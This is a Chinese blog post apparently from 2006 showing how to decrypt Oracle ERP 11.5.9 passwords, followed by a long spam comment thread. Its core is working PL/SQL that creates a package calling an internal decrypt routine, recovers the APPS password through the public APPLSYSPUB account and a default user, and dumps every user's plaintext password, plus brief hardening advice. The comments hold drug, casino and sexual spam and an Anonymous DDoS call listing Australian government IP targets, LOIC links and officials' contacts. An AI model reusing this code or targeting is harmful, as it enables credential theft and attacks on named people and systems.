可乐加冰

欢迎来到可乐加冰>>   | 首页 资源中心 | 開發 | 小說連載 | 人生感悟 | 英語學習 | 計算機軟硬件 | oracle erp學習與交流 | 娛樂 | 體育世界 | ITPUB论坛

破解Oracle ERP 密码

发表人:521102yz | 发表时间: 2006年五月05日, 16:14

1. 利用Toad或其它pl/sql工具在Oracle ERP Database中建立Package,源码如下


建立Package Header

CREATE OR REPLACE PACKAGE CrackPwd AUTHID CURRENT_USER

AS

FUNCTION getpwd (orauser IN VARCHAR2, appuserpwd IN VARCHAR2)

RETURN VARCHAR2;

END CrackPwd;

(2).建立Package Body

CREATE OR REPLACE PACKAGE BODY CrackPwd

AS

FUNCTION getpwd (orauser IN VARCHAR2, appuserpwd IN VARCHAR2)

RETURN VARCHAR2

AS

LANGUAGE JAVA

NAME 'oracle.apps.fnd.security.WebSessionManagerProc.decrypt(java.lang.String,java.lang.String) return java.lang.String';

END CrackPwd;

/

1. 取得APPS密码的步骤

假设现在什么Oracle erp权限都没有,怎么去知道oracle erp databaes的权限呢? 我们知道Oracle erp提供了一个database的公用账户(gateway user),此账户拥有database的最小权限,这个公用账号是: APPLSYSPUB/PUB(oracle erp网页中或URL中都有公开此账户),虽然此账户没有什么权限,但却有FND_USER_VIEW 的查询权限,通过这个view可以看到erp中所有的user和其ENCRYPED_FOUNDATION_PASSWORD字段,问题就出在这个viewENCRYPED_FOUNDATION_PASSWORD字段上, ENCRYPED_FOUNDATION_PASSWORD这个字段是由APPS的密码和用户密码一起通过加密算法得出的结果, 因此只要知道Oracle ERP的解密算法就可以通过fnd_user中任何一个userpassword反查apps的密码.,而要知道fnd_user中任何一个user的密码是太简单的事了,erp安装时就预设了很多账户,这些账户的user namepassword都是一样的,一般没有人去改这些账户的密码

2. 通过任何一个User name/password取得APPS密码的方法

SET SERVEROUTPUT ON

DECLARE

guestUserPwd VARCHAR2(200);

guestUserName VARCHAR2(100);

guestFndPwd VARCHAR2(100);

guestEncFndPwd VARCHAR2(100);

delim NUMBER;

BEGIN

guestUserPwd :='GUEST/ORACLE';--Can any user password

IF guestUserPwd IS NULL THEN

guestUserPwd := UPPER(fnd_profile.value('GUEST_USER_PWD'));

END IF;

delim := INSTR(guestUserPwd,'/');

guestUserName := UPPER(SUBSTR(guestUserPwd,1,delim-1));

SELECT encrypted_foundation_password INTO guestEncFndPwd

FROM fnd_user_view

WHERE user_name = guestUserName AND (start_date <= SYSDATE) AND

(end_date IS NULL OR end_date > SYSDATE);

guestFndPwd :=CrackPwd.getpwd(guestUserPwd,guestEncFndPwd);

IF NOT (guestFndPwd IS NULL) THEN

DBMS_OUTPUT.put_line(guestFndPwd);

END IF;

END;

: guestUserPwd :='GUEST/ORACLE';--Can any user password

上面这一行可以改成任何一个Userusername/password,账号和密码之间用”/”隔开

以上程序可以用toad执行

3. 通过FND_USER:ENCRYPTED_USER_PASSWORD取得明文密码的方法

SET SERVEROUT ON

DECLARE

v_encrypted_pwd VARCHAR2 (100);

v_apps_pwd VARCHAR2 (100);

v_user_pwd VARCHAR (100);

BEGIN

v_encrypted_pwd :='ZGA05468EA2C7A00CE5D9ED6562B352364325D40A247D58

3C10B916D88062771250F4BE653891CA90671C74187B132118335';

--get ENCRYPTED_USER_PASSWORD from fnd_user

IF v_apps_pwd IS NULL

THEN

v_apps_pwd := 'APPS';

END IF;

v_user_pwd := crackpwd.getpwd (v_apps_pwd, v_encrypted_pwd);

DBMS_OUTPUT.put_line (v_user_pwd);

END;

4. 通过上面建立的Package取得所有Oracle ERP Application User 密码的方法

SELECT user_name,CrackPwd.getpwd('APPS',ENCRYPTED_USER_PASSWORD) pwd FROM APPS.fnd_user

5. 通过上面建立的Package取得所有Oracle ERP Database User密码的方法

select fou.oracle_username,CrackPwd.getpwd('APPS',encrypted_oracle_password) pwd from APPS.fnd_oracle_userid fou

6. 删除第一步建立的Package

DROP PACKAGE CrackPwd

7. 结论

1).只要知道fnd_user中任何一个人的密码就可以反推APPS的密码,即使将databaseapps密码改掉也可以反推.
2).反过来只要知道了apps的密码,fnd_user中所有user的密码都可以反推
3).以此类推,只要知道fnd_user中任何一个人的密码就可以反推其它所有User的密码.
4).同理,oracle erp db user(table:fnd_oracle_userid)中密码的加密算法同fnd_user,也就是说只要知道了APPS的密码,db user的所有密码都可以反推.

8. 提高Oracle ERP的安全性

(1).更改APPS的密码

(2).更改所有预先安装的fnd_user中所有userpassword

(3).更改oracle erp database中的所有user(通过table:fnd_oracle_userid进行查询)password

(4).更改在Profile: GUEST_USER_PWD 中预先设置的GUEST账户密码

(5).尽量不要将Database 可以通过公网连接.

(6).User离职后要将其密码变更后才停用.

但此方法也无法防止内部User知道APPS密码,只有当你所有密码都更改过了,你才敢在公网上连接ERPDatabase.

9. 此程序在Oracle ERP 11.5.9通过Toad测试通过.

uidsfeeckocsd [回复]

uidsfeeckocsd

Mikl | 08/08/2007, 20:43

uidsfeeckocsd [回复]

uidsfeeckocsd

Mary | 08/08/2007, 20:43

uidsfeeckocsd [回复]

uidsfeeckocsd

George | 08/08/2007, 20:43

uidsfeeckocsd [回复]

uidsfeeckocsd

Randolf | 08/08/2007, 20:43

uidsfeeckocsd [回复]

uidsfeeckocsd

Randolf | 08/08/2007, 20:44

uidsfeeckocsd [回复]

uidsfeeckocsd

Carl | 08/08/2007, 20:44

uidsfeeckocsd [回复]

uidsfeeckocsd

George | 08/08/2007, 20:44

uidsfeeckocsd [回复]

uidsfeeckocsd

Carl | 08/08/2007, 20:44

uidsfeeckocsd [回复]

uidsfeeckocsd

Keril | 08/08/2007, 20:44

uidsfeeckocsd [回复]

uidsfeeckocsd

Mikl | 08/08/2007, 20:44

uidsfeeckocsd [回复]

uidsfeeckocsd

Fred | 08/08/2007, 20:44

uidsfeeckocsd [回复]

uidsfeeckocsd

Mary | 08/08/2007, 20:45

uidsfeeckocsd [回复]

uidsfeeckocsd

Mikl | 08/08/2007, 20:45

uidsfeeckocsd [回复]

uidsfeeckocsd

Randolf | 08/08/2007, 20:45

uidsfeeckocsd [回复]

uidsfeeckocsd

George | 08/08/2007, 20:45

uidsfeeckocsd [回复]

uidsfeeckocsd

Randolf | 08/08/2007, 20:45

uidsfeeckocsd [回复]

uidsfeeckocsd

Randolf | 08/08/2007, 20:45

uidsfeeckocsd [回复]

uidsfeeckocsd

John | 08/08/2007, 20:46

uidsfeeckocsd [回复]

uidsfeeckocsd

Randolf | 08/08/2007, 20:46

whywhrh44 [回复]

whywhrh44

Mary | 27/09/2007, 16:31

whywhrh44 [回复]

whywhrh44

Mounty | 27/09/2007, 16:31

whywhrh44 [回复]

whywhrh44

George | 27/09/2007, 16:31

鼠镨螯 GTA 4 狸鲨 [回复]

http://www.gta4.web3x.ru - 鼠镨螯 GTA 4 2dvd 玎 250 痼

Masa_nison | 06/01/2009, 01:46

Have u ever wonder how to wach naked girls on webcam for FREE!? [回复]

So here is the chance to get yourself free webcams . com account and u can watch naked girls
or boys if u want.
http://free-webcamscom-lifetime-account.blogspot.com/

Weaxalkaxia | 03/05/2009, 15:24

Test, just a test [回复]

Hello. And Bye.

XRumerTest | 04/05/2009, 10:06

Quick Ways to Earn Extra Cash [回复]

One of the easiest ways to earn money online, i am making arround 50$ a day! And u can do these t
o cause is realy easy.
U can find all the info on these blog
http://quick-ways-to-earn-extra-cash.blogspot.com/

gliliertFes | 07/05/2009, 13:15

Adult Friend Finder Gold Membership [回复]

Wow this what i have found is great! Until now i have pay for this service! but not anymore i have foind this blog
and followed steps as it is described.
And guess what, i have a free membership with greatest dating site ever!
http://adult-friend-finder-gold-membership.blogspot.com/

mymnuttemefug | 21/05/2009, 22:25

Booty Video [回复]

Hello Guys

just found this prurient bum Shaking vid on youtube...

check it out!

http://www.youtube.com/watch?v=BsoHCukkeUo

May you can share something similar.

happy watching
mastablubba

Mastablubba | 22/05/2009, 06:27

MilesGershon.Com vs. Spacify.com : Modern Plasma TV Stands & Wall Units [回复]

Hey Guys
I've been around here for a while now, and I finally found something worth writing about: I found a great deal on a custom [url=http://www.milesgershon.com][b] Modern Plasma TV Stand [/b][/url]. These guys have 24/7 call-in service and they installed AND delivered my wall unit all for Free!!! Check them out I highly recommend

Enjoy

encasyUpserce | 26/06/2009, 18:34

Bonjour everybody I'm Matthew from France [回复]

What's up world,

We recently signed up for the boards and I just desire to tell everyone how we would love to join this association. All joking aside. I are crazy about the generosity of your community :D

A bit on me:

I'm originally from Canada but at the moment I am living to the fascinating country that you could see in the post title ;). I am really shy but I still am crazy about travels. I also like skating.

Im 18 years of age. I can't wait to join this clan.

I am part of a website too. go see it http://1creditbureau.com

queeseask | 07/08/2009, 02:10

Hey I guess this is a good place to start?lol Hello room. [回复]

hi guys,new UK bodybuilder here, looks like a decent forum with lots of good info - hopefully i can contribute & learn.

kingrichards | 16/09/2009, 00:28

penny stock pick - www.stockhideout.com/members/pennystocks.html [回复]

Hey everyone cool site 521102yz.itpub.net I am new so look like I have alot to read lol anyway glad I joined.

________________________________________________________________________________________________________________________________________________________________________________________________________________________
[url=http://www.stockhideout.com/members/pennystocks.html]penny stock pick[/url]

kingrichards | 17/09/2009, 15:21

[回复]

屙 祀屐

parGreaxixJex | 13/10/2009, 20:04

Hello Everyone!! [回复]

Greetings-Great place here

New here
Just stopped in to say hello to all and keep up the good work!!

...see you around soon... [url=http://www.filipinatruelove.com]filipinatruelove.com[/url] ... or just say hello to me some time ...

Poriciamourry | 15/11/2009, 17:48

Free ringtones for the community [回复]

Hey, how is it going I decide to give out my favorite ringtone site to the community here is the best site for free ringtones.
They come in a sms text message.

http://bit.ly/8PU8Q2

I hope you enjoy

priffegmemins | 30/11/2009, 12:41

new and fress [回复]

[url=http://marleeghloqzd.blogspot.com/2009/11/blog-post_8848.html]篦遽龛

illeviavoli | 02/12/2009, 06:17

new and fress [回复]

[url=http://kellenzslavfc.blogspot.com/2009/11/blog-post_6851.html]玎犷脲忄龛

illeviavoli | 02/12/2009, 17:28

bonus gratuits casino [回复]

[url=][/url]

erydayaligree | 09/12/2009, 01:54

virtual vegas casino [回复]

[url=][/url]

tygroulaErota | 12/12/2009, 03:41

Test, just a test [回复]

Hello. And Bye.

XRumerTest | 05/01/2010, 18:52

generic xanax [回复]

[url=][/url]

meelayWhalt | 06/01/2010, 00:45

arava [回复]

arava

arava | 06/01/2010, 03:47

Good read [回复]

Great article, I did not know this!
JenniferSmith,
Site Admin [url=http://watchufc109online.net]watch UFC 109 online[/url]

PayopPype | 11/01/2010, 00:03

If I "Abort Scan" what does that mean? 10 POINTS!!!!? [回复]

Hello, my name is Amber. I need help with finding a good scene queen name. Thankyou (: Anything helps.

_____________
[url=http://www.clublacocinera.net/Foro_Lacocinera/viewtopic.php?p=10915#10915]Darmowe tapety[/url]

Dynchenly | 18/01/2010, 22:22

Info about forex broker requested [回复]

Hi I just registered to this spacious place 521102yz.itpub.net . I want to ask for your opinion.
Can you tell me please do you make money with forex and if yes what forex broker do you use?
Do you know of some trusted ones?

Thanks in advance for your answers.

P.S. Sorry if I have posted to wrong category this but as you can notice I am newbie here.

FloabeleR | 01/02/2010, 19:44

cheap autocad lt 2008 download [回复]

[url=][/url]

tolavappy | 04/02/2010, 20:17

discount autocad 2009 [回复]

[url=][/url]

boonseguefs | 06/02/2010, 21:15

card casino shuffler [回复]

card casino shuffler

casino | 09/02/2010, 06:18

WOW Grande trabalho, webmasternikw ..04 [回复]

Emplacement gentil hydrocodone cigarettes cialis
Acomplia Viagra !!

Trdfhjvz | 09/02/2010, 10:49

Austrailian Internet Censorship Has Gone To Far [回复]

FOR IMMEDIATE RELEASE

Greetings Australian Government Officials, Members of Local and International Press, and the General Public. We are Anonymous.

Austrailia - 2/8/2010 - Over the past several years, we have maintained a close watch on the actions of the Australian Government with particular focus on its stance towards internet censorship.

Australia's laws on internet censorship are already among the most restrictive in the western world. Their government filters more internet content than any other Parliamentary Democracy. For some elements within the Government, including Telecommunications Minister Senator Stephen Conroy, this still is not enough. Late in January of 2009 he proposed legislature that would lead to mandatory ISP filtering for all of Australia. The stated goal is to prevent Australia from viewing "illegal and unwanted content" on the internet.

Anonymous' concern with this legislature is twofold.

First, the ambiguity of the term "unwanted content" is completely unacceptable. No government should have the right to refuse its citizens access to information solely because they perceive it to be "unwanted." Indeed, the only possible interpretation of "unwanted content" is content that the government itself does not want to be seen.

More importantly, Anonymous does not approve of the steps already undertaken by the Australian Government to control what their populous sees. Claiming to be cracking down on "simulated child pornography," many depictions of women with small breasts in pornography have been banned. Officials cannot claim that they believe the models in these movies are in fact underage, as the production the titles that have been affected are heavily regulated to ensure the age of the models. Instead they are relying on earlier ambiguous wording that allows pornography featuring models that "appear to be" under 18 years of age to be treated in the same manner as actual child pornography.

The repercussions of this censorship of a natural body type on the psyche of Australian women cannot be understated, but this is not Anonymous' concern. The Australian Government will learn that one does not mess with our porn. No one messes with our access to perfectly legal (or illegal) content for any reason.

We are Legion.
We do not Forgive.
We do not Forget

Expect us.

Contact: operation.titstorm@gmail.com

###

[IMG]http://img52.imageshack.us/img52/4783/operationtitstormraidpo.jpg[/IMG]

IRC link:
irc.rizon.net
#titstorm

YOUTUBE VIDEO:(swarm it!)
http://www.youtube.com/watch?v=aZiSnqRUR9s

News:
http://www.theage.com.au/national/indian-journal-focuses-on-hate-20100131-n6ju.html

http://australianetworknews.com/

Government officials: (Specifics Later)
http://www.aph.gov.au/DPS/Administration.htm

Fax Information(black Faxing):
http://partyvan.info/wiki/Operation_Baylout#Black_Faxes

Initial Plan:
Black Faxes--->SKype calles---->Porn to officials-->DDoS--->Bombs

LOIC:
http://www.mediafire.com/?kwzmzw00hnj
http://sourceforge.net/projects/loic/files/loic/loic-1.0.2/

LOIC Tutorial:
http://www.youtube.com/watch?v=6OLzvjDqrOo

links to find DDOS Targets:
http://www.iptools.com/dnstools.php?tool=ipwhois&user_data=202.14.81.230&submit=Go
http://www.robtex.com/dns/search.aph.gov.au.html

DDOS Targets:
aph.gov.au has address 202.14.81.230
aph.gov.au mail is handled by 100 smtp2.aph.gov.au.
aph.gov.au mail is handled by 100 smtp1.aph.gov.au.
smtp2.aph.gov.au has address 202.14.81.7
smtp1.aph.gov.au has address 202.14.81.8

CAPTCHA solution: (used for automated blackfax, already working) (disregard this)
http://www.newocr.com/

Automated Blackfaxing:
http://rapidshare.com/files/344590624/fzcaptcha.7z.html

Government Contact:

Postal Address:
Department of Parliamentary Services
PO Box 6000
Canberra
Australian Capital Territory
Australia 2600

Phone:
(02) 6277 7111
(international: 61+ 2 6277 7111)

Fax:
(02) 6277 5417
(international: 61+ 2 6277 5417)
Executive Staff

Secretary - Mr Alan Thompson
Tel: (02) 6277 7100
Fax: (02) 6277 5417
email: alan.thompson@aph.gov.au

Deputy Secretary - Mr David Kenny
Tel: (02) 6277 5533
Fax: (02) 6277 5417
email: david.kenny@aph.gov.au

Parliamentary Librarian - Ms Roxanne Missingham
Tel: (02) 6277 7102
Fax: (02) 6277 2403
email: roxanne.missingham@aph.gov.au

Chief Finance Officer - Mrs Judy Konig
Tel: (02) 6277 8818
Fax: (02) 6277 8800
email: judith.konig@aph.gov.au

Assistant Secretary, Content Management Branch - Ms Therese Lynch
Tel: (02) 6277 2888
Fax: (02) 6277 8252
emial: Therese.Lynch @aph.gov.au

Assistant Secretary, Product and Services Development Branch - Ms Freda Hanley
Tel: (02) 6277 8118
Fax: (02) 6277 5210
email: liz.bryant@aph.gov.au

Acting Assistant Secretary, Research Branch - Ms Nola Adcock
Tel: (02) 6277 2470
Fax: (02) 6277 2528
email: nola.adcock@aph.gov.au

Acting Assistant Secretary, Information Access Branch - Ms Judy Hutchinson
Tel: (02) 6277 7103
Fax: (02) 6277 2634
email: judy.hutchinson@aph.gov.au

Assistant Secretary, Infrastructure Services Branch - Mr Terry Crane
Tel: (02) 6277 5001
Fax: (02) 6277 8999
email: terry.crane@aph.gov.au

Acting Assistant Secretary, Building Services Branch - Ms Bronwyn Graham
Tel: (02) 6277 4700
Fax: (02) 6277 8252
email: bronwyn.graham@aph.gov.au

Assistant Secretary, Future Outlooks - Ms Jane Romeyn
Tel: (02) 6277 8812
email: jane.romeyn@aph.gov.au

educhelew | 09/02/2010, 11:51

yhkumibmange [回复]

taylor swift having sex taylor swift carnival ride taylor swift fuck taylor swift concert information fake taylor swift nudes abagail anderson taylor swift where does taylor swift live kanye west/ taylor swift

enivukzezora | 09/02/2010, 14:20

comment3: Ik bookmarked dit guestbookemoz :)))93 [回复]

Passendster Respekt meridia $
adipex (!) Acomplia Klonopin , ATIVAN+ ativan oqsdt!! gfuw

Vtikjyps | 09/02/2010, 14:35

zyxel vista driver [回复]

[url=http://advertising.johngrudenclips.info/sony-driver-for-flash.html]Sony Driver For Flash[/url]
[url=http://advertising.johngrudenclips.info/sony-mpf920-z-driver.html]Sony Mpf920-z Driver[/url]
[url=http://advertising.johngrudenclips.info/sony-tsl-11000-dds-autoloader-driver.html]Sony Tsl-11000 Dds Autoloader Driver[/url]

Sony Driver For Flash
Sony Mpf920-z Driver
Sony Tsl-11000 Dds Autoloader Driver

KarpCyday | 09/02/2010, 16:09

zyxel vista driver [回复]

[url=http://johngrudenmiked.info/lexmark-z13-driver-download.html]Lexmark Z13 Driver Download[/url]
[url=http://johngrudenmiked.info/lg-driver-downloads-gsa-h10n.html]Lg Driver Downloads Gsa H10n[/url]
[url=http://johngrudenmiked.info/lg8300-device-driver.html]Lg8300 Device Driver[/url]

Lexmark Z13 Driver Download
Lg Driver Downloads Gsa H10n
Lg8300 Device Driver

Dycleblesse | 09/02/2010, 16:16

8, Acetaminophen Methadone Xanax Drug Test, %-), Alprazolam Xanax, cheeb, Phentermine Diet, 68748, 4 Alprazolam, >:-DDD, Alprazolam Aliud, vjpcg, Ultram Ultram A Span Td Tr, =))), Phentermine Mc, 9921, Is Xanax Habit Forming, 58013, Xanax Dosage With Alcohol Safe, 831, Phentermine Overnight No Prescription Legal Legal, diznsx, [回复]

8, Acetaminophen Methadone Xanax Drug Test, %-), Alprazolam Xanax, cheeb, Phentermine Diet, 68748, 4 Alprazolam, >:-DDD, Alprazolam Aliud, vjpcg, Ultram Ultram A Span Td Tr, =))), Phentermine Mc, 9921, Is Xanax Habit Forming, 58013, Xanax Dosage With Alcohol Safe, 831, Phentermine Overnight No Prescription Legal Legal, diznsx,

DrBrent | 09/02/2010, 16:25

Drug Online [回复]

Drug is one such drug that we will look into. Levaquin is a synthetic drug agent that is primarily used to treat severe bacterial infections. It is in the fluoroquinolone class of antiinfectives.
Levaquin is manufactured by the US Company Ortho-McNeil-Janssen Pharmaceuticals, Inc. The FDA approved this drug back in 1996 for use in the US for fighting massive bacterial infections. This drug reportedly has made Ortho-McNeil-Janssen over 1.6 billion in sales.

camaxtli | 09/02/2010, 16:33

risperidone [回复]

risperidone

risperdal | 09/02/2010, 18:21

cheryl cole [回复]

She went forthe command. She got to cheryl cole posters me.Victoria moaned. My daughter, cheryl cole legs iasked. It look at her look at the.Roosevelt took his sexual cheryl cole fake nude pic organs. And hair she could also see jacks cum.Greg was required to. Come dear. cheryl cole fake nude You will tell herit is.You why dont you bring those beautiful tits for a yellow was cheryl cole a chav and.Youre finger in cheryl cole nude calendar the two fingers and now i.Victoria in her analysis. Now over, id cheryl cole pussy love.Shes peeking out of jill, angela cheryl cole xfactor said, she said, holy or henry.I know why jack did, startling lynette was soon answered when she cheryl cole vogue had a.

cheryl | 09/02/2010, 18:22

发表评论

标题

在此添加评论

称呼

邮箱地址(可选)

个人主页(可选)




Valid XHTML 1.0 Strict and CSS. Powered by pLog
Design by Blog.lvwo.com